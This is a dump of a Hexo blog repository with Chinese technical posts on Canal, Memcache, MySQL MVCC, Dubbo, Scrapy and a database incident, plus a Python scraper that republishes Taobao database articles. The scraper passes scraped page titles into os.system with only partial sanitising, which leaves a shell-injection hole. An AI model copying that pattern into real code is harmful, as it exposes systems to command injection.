三、嵌入式服务启动\n\n在CanalController start中调用embededCanalServer.start(destination)启动相应destination的嵌入式服务,这里在调用相应(destination)实例的start方法启动,这个实例是如果产生的?是通过CanalController中的instanceGenerator生成的,具体有两种生成方式:\n- 1)ManagerCanalInstanceGenerator()\n这种方式在阿里云内部使用\n- 2)SpringCanalInstanceGenerator()\n这种方式社区使用较多,我们以这种方式来分析\n默认使用的sprint配置文件是通过canal.properties中配置的的canal.instance.global.spring.xml = classpath:spring/file-instance.xml\n也就是file-instance.xml了,查找配置中id为\"instance\"的bean即可。\n这里是CanalInstanceWithSpring这个类,原来是调用他的start的方法,他的start的方法的实现是在父类AbstractCanalInstance中。\n\n```\npublic void start() {\n super.start();\n if (!metaManager.isStart()) {\n metaManager.start();\n }\n\n if (!alarmHandler.isStart()) {\n alarmHandler.start();\n 
}\n\n if (!eventStore.isStart()) {\n eventStore.start();\n }\n\n if (!eventSink.isStart()) {\n eventSink.start();\n }\n\n if (!eventParser.isStart()) {\n beforeStartEventParser(eventParser);\n eventParser.start();\n afterStartEventParser(eventParser);\n }\n logger.info(\"start successful....\");\n}\n```\n\nStart方法很明确了,调用instance中meta、alarm、store、sink、parse的start方法,接下来一个个分析相应的模块。"
},
{
"alpha_fraction": 0.8002183437347412,
"alphanum_fraction": 0.817685604095459,
"avg_line_length": 23.440000534057617,
"blob_id": "db279ceb116397709743fa0c96b897ef51e8535b",
"content_id": "4deacb0a4f3a9e00f5fe354f93de5ce29c009c36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3862,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 75,
"path": "/source/_posts/memcache.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Memcache内部原理\ndate: 2018-08-30 22:38:46\ncategories: 开源项目\ntags: [memcache,内存]\n---\n### 基本数据结构\n\n- chunk\n> 是一系列固定大小的内存空间,用于缓存数据的内存块。\n- slab\n> 用于切分为chunk的内存块,一个slabclass可挂载多个slabs\n- slabclass\n> 用于管理相同chunk大小的内存结构\n- item\n> 用于管理key/value的数据结构,一个item放于一个chunk中\n- LRU list\n> 用于管理各个slabclass的最近访问过的item, 以用于item踢出时的选择,list头部是最近访问过的item\n- hashtable\n> 用于查找数据时item寻址,对key计算hash值,再在hashtable中找到对应的item, 取出数据\n- slots list\n> 是slabclass用于管理当前class的空闲item的list, 由slabclass结构中的slots指针指向\n- Page\n> 内存分配的最小单位,默认1M,可以通过-I参数在启动时指定。如果需要申请内存时,memcached会划分出一个新的page并分配给需要的slab区域。\n\n### 常规的内存使用方式\n- 预分配\n> 可能浪费内存,是一种拿空间换时间的方式,提高速度\n- 动态分配\n> 相对来说比预分配慢点,但节约内存\n\n### memcache内存分配\n为了规避内存碎片问题,memcache使用的是Slab Allocation的预分配的方式使用内存。\n\n内存分配策略:按slab需求分配page,各slab按需使用chunk存储。\n\n> Slab Allocation是将内存按指定大小分块(chunk),将相同大小的块组成分组。默认chunk是1.25倍增加的,并且分配的内存不会释放,可以重复使用,避免内存碎片的产生。\n> \n> Memcached 在启动时通过-m参数指定最大使用内存,但memcache并不会一启动就占用这么大内存,而是根据需要逐步分配给各个slab的。\n> \n> 如果一个新的数据需要缓存时,memcached先根据数据大小选择一个合适的slab,再查看该slab是否还有空闲的chunk,有则直接存进去,否则需要slab申请一个page的内存,并切分成多个chunk,将数据存到切分出的第一个chunk中。\n>\n> 如果没有可用的内存分配给slab,系统就会触发LRU机制,通过删除冷数据来释放内存空间。\n> \n> PS:服务端维护着一个未使用的内存块的列表,所以很容易就知道slab下是否有空闲的chunk\n\n### 惰性过期机制\nmemcache内部没有提供过期检查机制,而是在get时依据记录的过期时间检查是否过期。\n默认,内部也维护一套LRU置换算法,当设定的内存满了的时候,会按照置换算法删除一些冷数据,LRU不是全局的,而是对slab而言的。\n\n### 分布式策略\n- 余数算法\n> 先key的整数散列值,再除以服务器数量,根据得到的余数确定存储的服务器。\n> \n> 优点:简单、高效;\n> \n> 缺点:当服务器增加或者减少时,几乎所有的缓存都会失效。\n- 散列算法(一致性hash)\n> - 先算出所有服务器散列值,将其分布到0~2^32的圆上\n> - 同样的方法,计算出key的散列值,并分布到上面的圆上\n> - 从key映射的位置,顺时针查找,将数据存储到查找到的第一台服务器上,大于2^32还没有找到,就存储到第一台服务器上。\n>\n> 优点:当增加或减少服务器时,只影响增加或者减少服务器的圆上位置的顺时针下一台服务器上的数据\n\nmemcache使用客户端一致性hash算法实现分布式存储。\n\n### 特性\n- memcache保存的item的数量在内存足够的情况下是没有限制的\n- key的最大长度:250字节\n- value的最大长度:1m字节\n- memcache服务端是不安全的,可以通过Telnet,flush_all将所有数据失效\n- 不能遍历所有item,很慢并且阻塞其他操作\n\n### 参考\n[深入memcached内部](http://lostphp.com/blog/564.html)"
},
{
"alpha_fraction": 0.541769802570343,
"alphanum_fraction": 0.5785890817642212,
"avg_line_length": 31,
"blob_id": "01a143262d9dc434fe31106de9da62bf4deed27e",
"content_id": "d75b3532ee70e59c7ce61665ed6ad9943cee74eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3301,
"license_type": "no_license",
"max_line_length": 274,
"num_lines": 101,
"path": "/blog.py",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport logging\nimport logging.config\nimport argparse\nimport time\nimport requests\nfrom tomd import Tomd\n\nfrom bs4 import BeautifulSoup\n\nblog_domain = \"http://mysql.taobao.org\"\n\n\ndef main_page():\n r = requests.get( blog_domain + \"/monthly/\", headers=headers)\n r.encoding='utf-8'\n soup = BeautifulSoup(r.text, 'html.parser')\n # print (len(soup.select('.posts')))\n for link in soup.select('.posts')[0].find_all('a'):\n \tmonth_page(link.get('href'))\n\ndef month_page(month):\n r = requests.get(blog_domain+month, headers=headers)\n r.encoding = 'utf-8'\n soup = BeautifulSoup(r.text, 'html.parser')\n # print (soup.prettify())\n for link in soup.select('.posts')[0].find_all('a'):\n href_arr = link.get('href').split('/')\n print (href_arr)\n\n if(int(href_arr[2]) > 2017):\n print(\"SKIP 2 --- \" + str(int(href_arr[2])))\n continue\n else:\n if(int(href_arr[2]) == 2017):\n if (int(href_arr[3]) > 2):\n print(\"SKIP 3 --- \"+str(int(href_arr[3])))\n continue\n if(int(href_arr[3]) == 2 and int(href_arr[4]) < 3):\n print(\"SKIP 4 --- \" + str(int(href_arr[4])))\n continue\n # print (\"--->\"+link.get('href'))\n blog(link.get('href'))\n\n\ndef blog(addr):\n r = requests.get(blog_domain+addr, headers=headers)\n r.encoding = 'utf-8'\n soup = BeautifulSoup(r.text, 'html.parser')\n blog_title = soup.title.string\n file_name = blog_title.replace(' ', '-')\n file_name = file_name.replace(' ', '-')\n file_name = file_name.replace('.', '-')\n file_name = file_name.replace('/', '-')\n file_name = file_name.replace('+', '-')\n file_name = file_name.replace('_', '-')\n file_name = file_name.replace('(', '')\n file_name = file_name.replace(')', '')\n print (addr)\n # hexo new\n os.system('hexo new \"{}\"'.format(file_name))\n time.sleep(0.5);\n blog_title_arr = blog_title.split('·')\n blog_header = '''\n---\ntitle: {}\ndate: 2018-09-28 15:47:45\ncategories: [alidb-monthly, {}, {}]\ntags: [{}, {}]\n---\n '''.format(blog_title, blog_title_arr[0].strip(), blog_title_arr[1].strip(), blog_title_arr[0].strip(), blog_title_arr[1].strip())\n blog_footer = '''\n\n## 郑重声明\n> 文章来自淘宝技术博客 [数据库内核月报](http://mysql.taobao.org/monthly/2017/04/01/)\n> \n> 本人为了学习方便而分类整理\n\n '''\n # print (soup.select('.post')[0].prettify())\n # print (blog_header + Tomd(str(soup.select('.post')[0])).markdown)\n write_file(file_name + '.md', blog_header + Tomd(str(soup.select('.post')[0])).markdown + blog_footer)\n\ndef write_file(file_name, content):\n file_path = './source/_posts/'\n with open(file_path+file_name, 'wt') as f:\n f.truncate()\n f.write(content)\n\nif __name__ == '__main__':\n headers = {'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'X-DevTools-Emulate-Network-Conditions-Client-Id': '853B53D93401C5EACDE50E409FCB0612', 'Upgrade-Insecure-Requests': '1'}\n # blog('/monthly/2018/07/02/')\n main_page()\n\n\n\n# vim: set expandtab ts=4 sts=4 sw=4 :\n"
},
{
"alpha_fraction": 0.44155845046043396,
"alphanum_fraction": 0.6233766078948975,
"avg_line_length": 11.833333015441895,
"blob_id": "ab134abbe8443490d6d4e049ee0707ee97c48c9f",
"content_id": "98cb4aa32eede2a69505f1d50e55300393a882bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 77,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 6,
"path": "/source/tags/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\n# title: tags\ndate: 2018-08-04 14:19:48\ntype: \"tags\"\ncomments: false\n---\n"
},
{
"alpha_fraction": 0.802247166633606,
"alphanum_fraction": 0.8297752737998962,
"avg_line_length": 24.44285774230957,
"blob_id": "27254f7065c72cbabba9fc005fcb4ca801532567",
"content_id": "250a41081fc023a79cd271f07a66781d04e459fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4510,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 70,
"path": "/source/_posts/creatives.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 【救火篇】业务数据存储设计问题引起的事故\ndate: 2018-08-18 23:36:34\ncategories: Design\ntags: [数据结构设计,表格存储,]\n---\n\n### 写在前面\n> 隔了很久没有更新博客了,这两周一直在忙着处理线上的一个存储故障,设计新的存储方案。现将大概的处理方式记录到博客中,真实的故障情况和新的存储设计文档,不便公开。\n>\n> 写设计文档过程中,真实感觉到自己从开始写博客这几个月来,有了进步。文档排版、组织、问题描述等等明显比之前好了很多。技术文档也像写代码一样,需要精心设计、组织~\n\n### 事故起因\n业务数据库(阿里云RDS)磁盘每天增长50G+,而且持续增长,总空间占用达到85%以上,急需扩容。\n\n### 分析磁盘占用情况\n- 通过分析RDS binlog定位到写入量比较大的四张表;\n- 通过阿里云DMS控制台,统计占用磁盘空间最大的几张表,跟binlog中定位的表一致;\n> 大概定位占用空间比较大的几个表,接着就开始分析这几张表的结构\n\n### 表结构分析\n> 针对这几张大表,分析其字段,发现表结构存在以下几个问题\n\n- 1)字段太多\n\t> 一张表将近40个字段\n\n- 2)字段类型选择不合适\n\t> 类似枚举类型的状态字段,使用int类型\n\n- 3)业务库存在Text类型字段\n\t> 其实页面上没有使用\n\n- 4)数据庸余太严重\n\t> 这个最为严重,为了一个需要统计的数据,而把整条记录这么多字段,并且有Text大字段,写两份,造成至少一倍的空间浪费\n\n### 临时解决方案\n\n首先,可以确定第4个问题,是最浪费空间,解决掉就可以释放一半的磁盘空间。\n\n于是,想办法将两条相同的业务数据(分两个表存储的),通过分析整合到一条上,删除另一个表中的记录。这样,离线操作就可以实现,又对线上业务基本没有影响。\n\n本想先将磁盘空间降下来,腾出时间,再针对其他问题做进一步的优化。\n\n### 接下来的问题\n\n通过上面的临时方案,业务端删掉了将近一半的数据。问题是MySQL的Delete操作并不会释放磁盘空间,需要对表执行Optimize操作,才能清理磁盘碎片,将空间释放。\n\n于是我们就准备对表执行Optimize操作,由于Optimize会锁表,所以需要停止写操作。\n\n从库上执行Optimize操作释放了300G+的空间,但主库上Optimize执行14个小时都没有完成,也没有释放出多少空间来,一直卡在那。\n\n通过跟阿里云技术咨询,MySQL对表执行Optimize操作整理碎片,需要临时空间,而我们主库的空间不够,所以一直卡在那。\n\n### 数据压力\n\n主库Optimize操作执行不动,后端数据又源源不断的有新数据进入。而且主库iops很高,sql执行比较慢。\n\n这个时候,为了不影响业务,我们想到两种方案:\n- 1)新建一个实例,把从库同步到新的实例上,然后drop掉原来的主库。\n> 这样,由于业务端&后端还有新的数据进入,所以需要先做一次主从切换,然后同步数据完成后,再将主从切换回原来的状态\n- 2)将主库再扩容,等新的存储方案设计并实现后,主库drop表来释放空间\n\n### 问题解决---空间释放\n起初是打算先将主库的磁盘空间释放,为新的设计开发争取时间,但Optimize执行不动,之前清理的庸余数据的空间释放不了,所以,只能采用上面列出的方案。\n\n第一种方案是可以彻底解决问题,但需要重新创建实例,并且同步从库全部数据(将近600G)也需要比较长的时间。再者,本身现在的方案是临时解决问题的方案,没有必要做这么复杂的数据同步和主从切换。\n\n于是,选择第二种方案,先维持现状,不能影响线上业务,扩容主库磁盘空间,为新的存储设计方案争取大概2周的时间。由于主库的磁盘iops比较高,sql执行比较慢,目前iops最大600,主库的iops使用一直处在700到800之间,处于超负荷的状态,所以这次也升级了下iops到1200。\n\n接下来,好消息到了。扩容了磁盘,升级了iops,当前后端数据可以放心入库了。并且由于剩余空间大了,iops也升级了,Optimize表执行也(“出乎意料的”)成功了,最终庸余的磁盘空间也释放掉了,终于可以安心设计新的存储方案了。"
},
{
"alpha_fraction": 0.510869562625885,
"alphanum_fraction": 0.6847826242446899,
"avg_line_length": 14.333333015441895,
"blob_id": "0a73f8af8494ba6b197191265671343ad60f6237",
"content_id": "e4bc9793cae92c178241223ff90d64ebffb48d6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 6,
"path": "/source/_posts/dubbo02.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: [Dubbo系列01]了解RPC\ndate: 2019-07-28 21:21:04\ncategories: Dubbo系列\ntags: [Dubbo]\n---\n"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7199297547340393,
"avg_line_length": 27.5,
"blob_id": "19dee274f0bfba343c43a94cc007d26f8c5ecfe1",
"content_id": "df8f613022044995b934d5a05aee7cdc8eb2851d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2431,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 40,
"path": "/source/_posts/MySql概述.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: MySql概述\ndate: 2018-01-22 19:23:37\ncategories: MySQL\ntags: [MySQL,MVCC]\n---\n\n** 并发控制: **\n通过读写锁实现;提高共享资源并发性的方式:锁的粒度(不同的锁策略)\nMySQL锁策略:\n表锁 & 行锁\n\n--------------------------------------------------------------------------------\n\n** 死锁: ** \nInnoDB将持有最少排他锁的事务回滚\n\n不同表使用合适的存储引擎很重要\n\n--------------------------------------------------------------------------------\n\n** MVCC多版本并发控制 ** \n行级锁的一个变种;开销更低;各种存储引擎的实现机制不同,但大都实现了非阻塞的读操作,写操作只锁定必要行;\n\nMVCC通过保存数据在某个时间点的快照实现;\n\nInnoDB的MVCC实现:\n通过在每行记录后面增加两个隐藏的列实现:一个行的创建时间;一个行的过期时间;(实际上不是时间而是版本号)\n\nInnoDB Repeatable Read隔离级别下MVCC的具体操作如下:\nSelect:InnoDB根据下面两个条件检查每行记录:\n 1. 只查找版本早于当前事务版本的数据行(也就是,行的系统版本号小于或等于事务的系统版本号),这样可以确保事务读取的行,要么在事务开始前已经存在,要么是事务自身插入或者修改过的;\n 2. 行的删除版本要么未定义,要么大于当前事务版本号;这可以确保事务读取到的行,在事务开始之前未被删除;\nInsert:InnoDB未插入的每行保存当前系统版本号作为行版本号;\nDelete:InnoDB为删除的每行保存当前系统版本号作为行删除标识;\nUpdate:InnoDB为插入一行新记录,保存当前系统版本号作为行版本号,同时保存当前系统版本号到原来的行作为删除标识;\n保存这两个额外的系统版本号,使得大多数读操作都不用加锁,这样使得读操作很简单,性能很好,且能保证只读到符合标准的行;不足是每行记录都需要额外的存储空间,需要更多的行检查和维护;\nMVCC只在Repeatable Read和Read Commited两个隔离级别下工作,其他两个都和MVCC不兼容;(Read Uncommitted总是读取最新行,Serializable对所有行都加锁)\n\n间隙锁(Next-Key Locking)防止幻读;(不仅仅锁定查询涉及的行,还会对索引中的间隙进行锁定,防止幻影行的插入)"
},
{
"alpha_fraction": 0.8396464586257935,
"alphanum_fraction": 0.8554292917251587,
"avg_line_length": 25.41666603088379,
"blob_id": "a27b6c80df9c5c2f12608eb6e95f2b012e45548a",
"content_id": "80aef14d2b69559f2bbbe361b11f6d36dc3f82b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3482,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 60,
"path": "/source/_posts/dubbo01.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 【Dubbo系列01】了解RPC\ndate: 2019-07-28 21:49:34\ncategories: Dubbo系列\ntags: [Dubbo]\n---\n\n7月底,自从上个月使用和研究Canal相关技术原理,这个月都在利用工作之余研究Dubbo相关技术,但一直没有写Dubbo相关博客,是因为Dubbo涉及的技术点比较多,自己对Dubbo没有一个整体的脉络,感觉不知道从哪里开始动笔。\n\n月初的时候慢慢开始研究服务治理相关的技术,于是开始了Dubbo学习,其实,在刚毕业那会已经对Dubbo有所了解,只是停留在使用层面。加上中间在创业公司使用Python技术栈,所以一直没有深入学习,这次开始决定深入学习下Dubbo及微服务领域的技术。\n\n经过大概一个月的时间,基本了解了Dubbo涉及的各个技术点,月末也对一月的学习做个总结,也为下个月的学习开个头。对Dubbo有个了大概的轮廓,在接下来一个月准备对Dubbo相关技术点及原理分别深入学习研究。\n\n## 一、定义\nRPC是指远程过程调用,它跟方法调用的区别在于是否是在同一个JVM下。\n\n## 二、面临的问题\n既然RPC调用不是在同一个JVM里面,那就面临着下面几个问题:\n- 通讯问题\n客户端和服务端需要通过网络(TCP)进行通讯,使用长链接或者短连接等。\n- 寻址问题\n客户端和服务端需要通过某种协议,约定好客户端通过RPC可以正确的调用到服务端的相应方法。\n- 网络传输问题\n客户端和服务端需要解决参数和返回结果如何在网络上传输的问题,也就是序列化和反序列化。\n\n## 三、RPC框架\n- Apache Dubbo\n阿里巴巴开源的一个Java高性能优秀的服务框架,使得应用可通过高性能的 RPC 实现服务的输出和输入功能,可以和 Spring框架无缝集成。\n- Motan\n新浪微博开源的一个Java 框架。\n- rpcx\nGo语言生态圈的Dubbo, 比Dubbo更轻量,实现了Dubbo的许多特性,借助于Go语言优秀的并发特性和简洁语法,可以使用较少的代码实现分布式的RPC服务。\n- grpc\nGoogle开发的高性能、通用的开源RPC框架,其由Google主要面向移动应用开发并基于HTTP/2协议标准而设计,基于ProtoBuf(Protocol Buffers)序列化协议开发,且支持众多开发语言。\n- thrift\nApache的一个跨语言的高性能的服务框架。\n\n## 四、Dubbo架构\n\n\n\n从架构图可以了解到,Dubbo主要包括5个角色:\n- Provider\n服务提供者,暴露服务。\n- Consumer\n服务消费者,调用远程服务。\n- Registry\n注册中心,服务注册、发现中心。\n- Container\n服务运行容器\n- Monitor\n服务监控中心,服务消费者& 服务提供者需要定时向Monitor汇报调用次数、调用时间等。\n\n#### 具体流程:\n0:Container负责启动,加载,运行服务提供者\n1:Provider启动时,向Registry注册自己提供的服务\n2:Consumer启动时,向Registry订阅自己关注的服务\n3:Registry返回给Consumer关注的Provider地址,如果有变更,Registry基于长链接推送变更数据给Consumer\n4:Consumer从Provider地址列表中,基于软负载均衡策略,选一台Provider进行远程调用,如果调用失败,则根据相应策略(failover、failfast等)重试其他Provider或者抛异常\n5:Consumer和Provider,在内存中累计调用次数和调用时间,定时发送统计数据给Monitor"
},
{
"alpha_fraction": 0.516853928565979,
"alphanum_fraction": 0.6741573214530945,
"avg_line_length": 13.833333015441895,
"blob_id": "f4e9f8c836f59471f03673681d85f6f375f538f3",
"content_id": "0eaa003d272606068c7c8c399282e98a0de80d20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 6,
"path": "/source/categories/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\n# title: categories\ndate: 2018-06-09 21:31:08\ntype: \"categories\"\ncomments: false\n---\n"
},
{
"alpha_fraction": 0.8471337556838989,
"alphanum_fraction": 0.8704883456230164,
"avg_line_length": 38.29166793823242,
"blob_id": "7d9ab065961f5ec0520d2475c7e589478beff9ce",
"content_id": "3b7ff98ef1ea067671de44a8543d32832f2ac1e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2560,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 24,
"path": "/source/_posts/growthhacker.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 《增长黑客》读后感\ndate: 2018-06-03 21:32:56\ncategories: 产品&运营\ntags: [增长黑客,Growth Hacker,用户增长]\n---\n\n增长黑客(Growth Hacker)源于硅谷,最早在2010年提出,真正引起业界关注是在2012年。一句话来描述是指这样一群人,他们以数据驱动营销、以市场指导产品,通过技术手段来达到增长目标的人群。---需要了解技术,又得了解用户心理,发挥创意,绕过限制,通过低成本解决初创公司产品早期的增长问题。\n\n书中通过对各种案例的分析讲解产品早期用户增长的策略、方法。早期产品选型,要以需求作为产品的第一原动力,用最小化实验验证产品可行性,探测市场需求。\n\n产品上线之后需要筛选种子用户试用,有效利用设计红利,打造可持续输出的内容营销引擎,其中搜索引擎和应用商店的SEO也是可以给产品带来有效流量的。\n\n种子用户可以给产品带来良好的口碑,前提是产品体验要顺畅,没有明显的bug。接下来就要激发活跃,这里提到了A/B测试,提升网站或者应用的活跃率方法。\n\n光有用户使用,完了之后就离开也不行,这时候需要提高留存率,减少用户流失,根据用户流失原因,对应相应的措施来提高产品的用户粘性,第一就要优化产品性能,这是用户流失的主要原因。再者就是放下不必要的功能,保证整个产品体验,这里可以提供有缺失的服务,但不能提供体验不好的服务。还有就是新手引导、社交绑定、设计用户唤醒机制等等。\n\n每个产品从立项起,最终的目的还是为了挣钱。当流量上来之后就得考虑如何盈利了。这里最简单的可能就是植入广告了,但这也会造成用户体验不好。\n\n营销上有个术语叫做病毒传播,这是用户增长的有效方法,包括蓄意策划的bug营销,借助热点乘势营销,以及产品内的病毒循环等等。这些都建立在对用户心理的了解及把握,打造出用户需要又有盈利的产品。\n\n在书的最后提到了几个互联网公司的增长案例,真的感觉技术之外的策略、门道很多,当然最后还谈到了职业道德问题,国外的相关政策较为成熟,国内还很欠缺,增长黑客们要以全球化的标准来对待用户隐私方面的问题。\n\n第一次读这种偏向运营和产品的书,感觉还是收获满满,希望对以后的职业发展有所启发。"
},
{
"alpha_fraction": 0.6587662696838379,
"alphanum_fraction": 0.6623764038085938,
"avg_line_length": 35.20454406738281,
"blob_id": "33d7d2b59fd1da86c67389fc74c1990266e26bd4",
"content_id": "bf41271f3367862c3b2b594d22ca3ceee7369d1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7069,
"license_type": "no_license",
"max_line_length": 310,
"num_lines": 176,
"path": "/source/_posts/scrapy-downloader.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Scrapy下载流程解析\ndate: 2018-06-25 21:40:57\ncategories: 源码研究 #文章文类\ntags: [Scrapy,源码,python] #文章标签,多于一项时用这种格式\n---\n对照下面的脑图,理解整个Scrapy下载流程:\n\n\n首先接着上篇,Engine中注册到事件循环的_next_request_from_scheduler()方法开始。\n\n> 实际上注册的是_next_request(),但_next_request()中真正执行的是_next_request_from_scheduler()\n\n看下这个方法:\n\n```\ndef _next_request_from_scheduler(self, spider):\n slot = self.slot\n request = slot.scheduler.next_request()\n if not request:\n return\n d = self._download(request, spider)\n d.addBoth(self._handle_downloader_output, request, spider)\n d.addErrback(lambda f: logger.info('Error while handling downloader output',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n d.addBoth(lambda _: slot.remove_request(request))\n d.addErrback(lambda f: logger.info('Error while removing request from slot',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n d.addBoth(lambda _: slot.nextcall.schedule())\n d.addErrback(lambda f: logger.info('Error while scheduling new request',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n return d\n\ndef _download(self, request, spider):\n slot = self.slot\n slot.add_request(request)\n def _on_success(response):\n assert isinstance(response, (Response, Request))\n if isinstance(response, Response):\n response.request = request # tie request to response received\n logkws = self.logformatter.crawled(request, response, spider)\n logger.log(*logformatter_adapter(logkws), extra={'spider': spider})\n self.signals.send_catch_log(signal=signals.response_received, \\\n response=response, request=request, spider=spider)\n return response\n\n def _on_complete(_):\n slot.nextcall.schedule()\n return _\n\n dwld = self.downloader.fetch(request, spider)\n dwld.addCallbacks(_on_success)\n dwld.addBoth(_on_complete)\n return dwld\n```\n\n结合上面我总结的脑图,实际上是调用Downloader的fetch()方法:\n```\ndef fetch(self, request, spider):\n def _deactivate(response):\n self.active.remove(request)\n return response\n\n self.active.add(request)\n dfd = self.middleware.download(self._enqueue_request, request, spider)\n return dfd.addBoth(_deactivate)\n\n```\n这个fetch方法有会调用middleware的download方法;这里的middleware是DownloaderMiddlewareManager,会实例化配置的所有下载中间件。并在download()方法中依序执行process_request、process_response方法,其中process_request是正序执行、process_response是逆序执行。并且会在所有中间件执行process_request之后,process_response执行之前执行真正的下载方法,这个方法是Downloader调用middleware时注册进来的_enqueue_request方法;看下面这个方法:\n```\ndef _enqueue_request(self, request, spider):\n key, slot = self._get_slot(request, spider)\n request.meta['download_slot'] = key\n\n def _deactivate(response):\n slot.active.remove(request)\n return response\n\n slot.active.add(request)\n deferred = defer.Deferred().addBoth(_deactivate)\n slot.queue.append((request, deferred))\n self._process_queue(spider, slot)\n return deferred\n\ndef _process_queue(self, spider, slot):\n if slot.latercall and slot.latercall.active():\n return\n\n # Delay queue processing if a download_delay is configured\n now = time()\n delay = slot.download_delay()\n if delay:\n penalty = delay - now + slot.lastseen\n if penalty > 0:\n slot.latercall = reactor.callLater(penalty, self._process_queue, spider, slot)\n return\n\n # Process enqueued requests if there are free slots to transfer for this slot\n while slot.queue and slot.free_transfer_slots() > 0:\n slot.lastseen = now\n request, deferred = slot.queue.popleft()\n dfd = self._download(slot, request, spider)\n dfd.chainDeferred(deferred)\n # prevent burst if inter-request delays were configured\n if delay:\n 
self._process_queue(spider, slot)\n break\n```\n\n看这里会做相应的并发控制,最终会调用_download()方法;\n```\ndef _download(self, slot, request, spider):\n # The order is very important for the following deferreds. Do not change!\n\n # 1. Create the download deferred\n dfd = mustbe_deferred(self.handlers.download_request, request, spider)\n\n # 2. Notify response_downloaded listeners about the recent download\n # before querying queue for next request\n def _downloaded(response):\n self.signals.send_catch_log(signal=signals.response_downloaded,\n response=response,\n request=request,\n spider=spider)\n return response\n dfd.addCallback(_downloaded)\n\n # 3. After response arrives, remove the request from transferring\n # state to free up the transferring slot so it can be used by the\n # following requests (perhaps those which came from the downloader\n # middleware itself)\n slot.transferring.add(request)\n\n def finish_transferring(_):\n slot.transferring.remove(request)\n self._process_queue(spider, slot)\n return _\n\n return dfd.addBoth(finish_transferring)\n```\n\n这里会调用handles的download_request()方法;handlers是DownloadHandlers,会加载配置中所有的DOWNLOAD_HANDLERS并实例化。\n\n```\ndef download_request(self, request, spider):\n scheme = urlparse_cached(request).scheme\n handler = self._get_handler(scheme)\n if not handler:\n raise NotSupported(\"Unsupported URL scheme '%s': %s\" %\n (scheme, self._notconfigured[scheme]))\n return handler.download_request(request, spider)\n```\n\n这个地方会根据Request的协议类型,调用相应的handler执行下载请求;下面以Http为例,继续下面的流程;\n> HttpDownloadHandler其实是HTTP10DownloadHandler的扩展,实际的下载器是HTTP10DownloadHandler\n\n```\ndef download_request(self, request, spider):\n \"\"\"Return a deferred for the HTTP download\"\"\"\n factory = self.HTTPClientFactory(request)\n self._connect(factory)\n return factory.deferred\n\ndef _connect(self, factory):\n host, port = to_unicode(factory.host), factory.port\n if factory.scheme == b'https':\n return reactor.connectSSL(host, port, factory,\n self.ClientContextFactory())\n else:\n return reactor.connectTCP(host, port, factory)\n```\n\n这里直接调用的Twisted的相关网络实现来完成下载请求的。"
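上面整个下载流程本质上就是一条Deferred回调链(addCallback/addBoth/addErrback层层注册)。下面是一个不依赖reactor的小例子(假设环境中已安装Twisted),演示这种链式回调的执行方式:

```python
from twisted.internet import defer

def parse(response):
    # 相当于下载成功后注册的 _on_success 回调
    return response.upper()

def finish(result):
    # 相当于 addBoth 注册的收尾逻辑,成功或失败都会执行
    print('finished with:', result)
    return result

d = defer.Deferred()
d.addCallback(parse)          # 成功时依次经过这些回调
d.addBoth(finish)             # 类似 _on_complete,无论成败都执行
d.callback('response body')   # 模拟下载完成,触发整条回调链
```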
},
{
"alpha_fraction": 0.7082836627960205,
"alphanum_fraction": 0.7264600992202759,
"avg_line_length": 44.364864349365234,
"blob_id": "a8c9725d7fde4fcf0ad11366e3770556b45585e1",
"content_id": "6490a04d9f808a748adcbc2b7ec17ddf1bfb36f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4278,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 74,
"path": "/source/_posts/canal04.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
